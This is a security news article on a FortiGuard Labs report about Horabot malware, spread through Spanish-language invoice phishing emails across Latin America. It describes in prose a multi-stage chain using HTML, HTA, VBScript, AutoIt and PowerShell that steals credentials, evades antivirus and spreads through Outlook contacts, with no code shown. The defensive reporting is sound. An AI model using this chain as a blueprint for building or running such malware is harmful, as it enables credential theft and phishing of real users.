Threat Actors Leverage Weaponized HTML Files to Deliver Horabot Malware

A recent discovery by FortiGuard Labs has unveiled a cunning phishing campaign orchestrated by threat actors deploying Horabot malware, predominantly targeting Spanish-speaking users in Latin America.

This high-severity threat, detailed in the 2025 Global Threat Landscape Report, exploits malicious HTML files embedded in phishing emails to steal sensitive information, including email credentials and banking data, while propagating through corporate and personal networks.

Active since at least April 2025, the campaign focuses on users in countries such as Mexico, Guatemala, Colombia, Peru, Chile, and Argentina, using culturally tailored emails masquerading as legitimate invoices to deceive victims.

Sophisticated Phishing Campaign

The attack begins with a phishing email written in Spanish, often claiming to include a PDF invoice under subject lines like “Factura Adjunta” (Attached Invoice).

These emails lure recipients into opening a ZIP attachment containing a malicious HTML file with Base64-encoded data.

Once decoded, the HTML reveals a remote URL that downloads a secondary payload, a ZIP file named “ADJUNTOS_23042025.zip,” housing an HTA file.

According to Fortinet Report, this file employs browser redirection tricks and loads further malicious scripts, initiating a complex infection chain involving VBScript, AutoIt, and PowerShell.

The VBScript, hosted on remote servers, uses custom string decoding to evade static detection, performing tasks like environment checks for antivirus software (e.g., Avast) and virtual machines, alongside creating persistence mechanisms via shortcuts in startup folders.

It also orchestrates data exfiltration by collecting system information-such as IP addresses and usernames-and sending it to command-and-control (C2) servers.

Multi-Stage Attack Chain

Subsequent payloads include an AutoIt script that decrypts a malicious DLL with a hardcoded key, enabling the theft of browser data from applications like Google Chrome, Microsoft Edge, and Opera, while deploying fake pop-up windows to capture login credentials.

Simultaneously, PowerShell scripts exploit Outlook COM automation to harvest email contact lists, filter out specific domains (e.g., Gmail, Hotmail), and send tailored phishing emails with malicious attachments to new victims, ensuring lateral spread within networks.

This self-propagating mechanism, combined with cleanup routines to erase traces, renders Horabot particularly stealthy and challenging to detect as it blends seamlessly with legitimate Windows and Outlook behaviors.

FortiGuard Labs emphasizes the growing sophistication of such phishing attacks, urging organizations to implement robust email filtering, monitor for anomalous file activity, and educate employees on recognizing phishing attempts.

Fortinet’s security solutions, including FortiGate and FortiMail, detect and block this malware under signatures like HTML/Phishing.683A!tr and AutoIt/Agent.HA!tr, offering protection to customers with updated systems.

Additionally, free cybersecurity training from Fortinet is recommended to bolster user awareness.

Indicators of Compromise (IOCs)